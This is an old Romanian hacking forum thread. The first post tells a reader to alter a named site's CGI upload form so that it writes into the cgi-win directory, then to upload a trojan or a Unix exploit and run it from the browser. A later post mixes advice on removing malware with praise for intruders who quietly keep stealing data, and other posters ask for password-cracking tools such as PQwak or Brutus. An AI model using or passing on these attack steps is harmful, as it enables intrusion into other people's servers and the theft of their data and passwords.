bebe2000 nu merge dimineata!!Inlocuieste cu o adresa pe hotmail.
Cand vezi sursa paginii uite-te la formular si o sa vezi ceva de genul:
<..METHOD=POST ACTION="http://www.andre.ro/cgi-win/uploader.exe/Uploads/">
Uploads este diectorul unde vei incarca tu fisierele,eventual index.html,dar eu nu am de
unde sa stiu ca acest director este chiar directorul unde au ele paginile de web publicate.
Schimba uploads cu cgi-win:
ACTION="http://www.andre.ro/cgi-win/uploader.exe/cgi-win/"
Apoi incarca cu ajutorul formulaului meu un troian pe care il executi din browser:
Daca sistemul de operare este Unix atunci server.exe nu ruleaza,gaseste un exploit pentru
Unix si ruleaza-l din browser.Pe astalavista gasesti troieni si backdoor-uri Unix.
Cele mai adevarate sunt scripturile cu extensia sh.
Distractie placuta!
_______________________________________
void()
|
|
| pus acum 18 ani |
|
Salieri
Mafioso
Din: Sufragerie
Inregistrat: acum 19 ani
Postari: 469
|
|
Va rog mult sa cititi acest articol pana la capat,deoarece valoreaza mult mai mult decat celelalte dupa parerea mea.
Din pacate acolo unde exista intelepti exista si nebuni,oameni care fac rau numai din placerea de a face,fara nici un interes material sau de alta natura.Categoria mentionata este mare,eu o sa mentionez numai un exemplu,un incident nefericit.Putin inainte de a scrie acest articol,mai precis cu o zi inainte,am folosit motorul de cautare de la pentru a descarca un program.Dupa aspectul dubios al site-ului mi-am dat seama imediat ca am de-a face cu un virus,dar mi-am pus nadejdea in masurile de securitate excelente pe care le am impotriva oricarui tip de atac.Asa ca am descarcat programul si l-am rulat.Antivirusul nu a dat nici un semn de viata.Mi-am contnuat lucrul mai departe.Nimic.Poate m-am inselat,mi-am zis.Am inchis computerul si m-am culcat.A doua zi i-am dat drumul.Dezastru.Ecran negru.Hardul putea sa faca concurenta celui mai nenorocit tractor african.Am intrat pe Safe Mode.Acelasi lucru.Am intrat in binecuvantatul sistem de operare MSDOS,pe care nu il voi mai critica niciodata.Am vrut sa vad continutul fisierelor "win.ini","system.ini","autoexec.bat".Am gasit ceea ce cautam.In fisierul "system.ini" la linia "shell" era ceva de genul:
shell=Explorer.exe gkgflllgg.exe
Am sters toata linia pana la semnul egal.Am cautat programul gkgfllgg.exe si l-am sters.Nici un rezultat.Dupa doua ore de investigatii si dupa ce mi-am epuizat toata gama de injuraturi am izolat toate fisierele infectate si le-am sters.Nimic.Nu puteam sa intru in Windows deci nu aveam acces la registrii.Am reinstalat Windowsul dar am pierdut 100MB de pe hard plus niste informatii pe care nu doream sa le pierd.De aceea vreau sa va dau cateva sfaturi foarte utile privind propria securitate pe Net.
1)Nu va incredeti in nici un antivirus indiferent de upgrade,zilnic apar peste 12000 virusi din ce in ce mai "duri'.
2)Nu descarcati nici un program de carding,hack,nuke,dial-up de pe site-urile romanesti prezente in top100.Nici nu merita sa vizionati acele site-uri care va promit orice fara nici un efort.Daca totusi o faceti,inspectati cu atentie site-ul.Daca nu mai contine link-uri la alte pagini,adrese de mail sau explicatii plauzibile,daca conditioneaza vizionarea lor de votul dvs in top100 plecati imediat.
3)Cei care promoveaza site-uri ilegale,pornografice,in care se gasesc numere de carti de credit si alte dracii ,si va ofera programe cu pretentia ca puteti rezolva orice problema cu ele se inseala iar dvs sunteti cei pacaliti.
4)Programele care pretind ca listeaza toate conturile celor conectati la internet numai introducand IP-ul serverului sunt virusi sau troieni.Exemple de astfel de programe virusate,incarate de mine din simpla curiozitate pentrua vedea pana unde merge magaria, prostia si lipsa de judecata a unora sunt:Iris.exe,dial_up_sniffer.exe,infiltrator.exe.Aceste programe sunt gazduite de siteuri formate dintr-o singura pagina si care au foarte multe voturi in top100.Singura pagina in care am incredere prezenta in top100 se afla la
Studiind comportamentul acestui virus,cat si a altora am ajuns la concluzia ca majoritatea acestor programe odata rulate creeaza din corpul lor alte fisiere in directorul Windows sau System iar apoi creeaza intrari in registrii.De aceea se impune o monitorizare atenta a modificarilor continutului unui director.Dupa acest incident m-am hotarat sa creez un astfel de program de monitorizare care sa ruleze atat sub Windows cat si sub Dos.Sper sa fie gata pana pe 14 ianuarie 2000 si sa fie pus la dispozitia dumneavoastra cu tot cu cod sursa.
Cand rulati un program si apare o caseta de dialog de genul "cannot find blabla.dll" sunt 90% sanse sa fie virus.Nu iesiti din windows,stergeti linia "shell" din "system.ini",sa ramana ceva de genul "shell=Explorer.exe",stregeti toata linia "run" din fisierul "win.ini",sa ramana numai "run=",afisati continutul fisierului "autoexec.bat" si inspectati continutul apoi vedeti calea "c:/windows/start menu/programs/startup" si stregeti tot ce va pare suspect,adica ce nu ati avut inainte.Apoi tastati "regedit" si stregeti CLSID-urile suspecte,o sa scriu un tutorial despre registrii cat de curand.
Un hacker adevarat nu distruge nimic atunci cand reuseste sa patrunda intr-o retea ci foloseste in interes propriu toate informatiile sustrase.Am intalnit lameri nenorociti care formateaza hardul computerului in care reusec sa patrunda cu ajutorul programului Legion sau a altor programe de acest gen.Asta denota lipsa de materie canusie,nu-si imagineaza ca pot sa tina computerul respectiv sub control timp indelungat si sa sustraga in timp toate informaiile.
Daca gasiti vreo explicatie pentru care cineva doreste sa distruga ceva fara nici un motiv trimiteti un email la adresa .
_______________________________________
void()
|
|
| pus acum 18 ani |
|
|
tomavasi
Membru nou
Inregistrat: acum 19 ani
Postari: 15
|
|
vreau PQwak , am cautat o zi intrega pe google dupa el .am inteles ca la XP numai functioneaza ; exista o alta solutie de afla parolele?un brutus obijnuit? oricum daca ai PQwak
|
|
| pus acum 18 ani |
|
|
Ezraeil-Omad
Membru nou
Inregistrat: acum 18 ani
Postari: 26
|
|
din punctul meu de vedere este destul de interesant .. si ff posibil de realizat de catre oricine.. numai ca eu de cand am inceput hacking de la maimutza la om incoace sunt mai batut in cap  putina asistentza pls sau poate chiar o colaborare dau ID de mess.
_______________________________________
...:::Only God Can Judge Me:::...
|
|
| pus acum 18 ani |
|